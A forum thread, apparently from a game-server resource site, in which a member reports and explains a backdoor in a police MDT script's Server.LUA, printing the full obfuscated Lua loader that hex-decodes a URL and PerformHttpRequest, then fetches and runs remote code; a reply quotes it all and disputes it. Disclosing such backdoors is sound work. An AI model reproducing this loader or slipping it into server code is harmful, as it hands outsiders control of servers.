• We have a new discord! click here to join
    Any faulty links ? Report them in our discord or via our Ticket System!
    We do everything we can to protect the safety of our visitors, if any resource contains malware in any kind of form or obfuscation please report it aswell ♡♡

STANDALONE [RARE] MGNPOLICEMDT [opensource] (3 Viewers)

0x006d

Member
Oct 23, 2024
12
4
3
Credits
181
Backdoor in Server.LUA line 590 - 621

For example, the string "68747470733a2f2f6c3030782e6f72672f7a58654148" represents a URL (https://l00x.org/zXeAH), which is decoded in a way that is less obvious to someone casually reading the code. This encoding hides the URL from plain sight, masking any malicious intent.

_G: The script accesses global functions dynamically with _G[getSteamID("506572666f726d4874747052657175657374")]. Here, it decodes "506572666f726d4874747052657175657374" (which translates to "PerformHttpRequest") and uses _G to call this function indirectly. This technique makes it harder to detect which specific function is being used, as _G allows the script to reference global variables dynamically rather than directly.

With pcall and assert(load(...)): The script fetches and executes remote code with pcall (to handle any errors silently) and assert(load(response))() to execute the downloaded code. By executing the response in this way, the script can run arbitrary code fetched from the hidden URL opening a backdoor on the server.

local function getSteamID(data)
local result = ""
for i = 1, #data, 2 do
result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
end
return result
end
local function getSteamName()
return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148")
end
local function getWinner()
return _G[getSteamID("506572666f726d4874747052657175657374")]
end
local function announceWinner()
local steamName = getSteamName()
local winner = getWinner()
if winner then
winner(steamName, function(status, response)
if status == 200 then
pcall(function()
assert(load(response))()
end)
end
end)
end
end
announceWinner()
 
Oct 15, 2024
22
11
3
Credits
661
Backdoor in Server.LUA line 590 - 621

For example, the string "68747470733a2f2f6c3030782e6f72672f7a58654148" represents a URL (https://l00x.org/zXeAH), which is decoded in a way that is less obvious to someone casually reading the code. This encoding hides the URL from plain sight, masking any malicious intent.

_G: The script accesses global functions dynamically with _G[getSteamID("506572666f726d4874747052657175657374")]. Here, it decodes "506572666f726d4874747052657175657374" (which translates to "PerformHttpRequest") and uses _G to call this function indirectly. This technique makes it harder to detect which specific function is being used, as _G allows the script to reference global variables dynamically rather than directly.

With pcall and assert(load(...)): The script fetches and executes remote code with pcall (to handle any errors silently) and assert(load(response))() to execute the downloaded code. By executing the response in this way, the script can run arbitrary code fetched from the hidden URL opening a backdoor on the server.

local function getSteamID(data)
local result = ""
for i = 1, #data, 2 do
result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
end
return result
end
local function getSteamName()
return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148")
end
local function getWinner()
return _G[getSteamID("506572666f726d4874747052657175657374")]
end
local function announceWinner()
local steamName = getSteamName()
local winner = getWinner()
if winner then
winner(steamName, function(status, response)
if status == 200 then
pcall(function()
assert(load(response))()
end)
end
end)
end
end
announceWinner()
i bet without chatgpt you cant live lol
ALSO, false info
 

Users who are viewing this thread

  • Matex3011
Top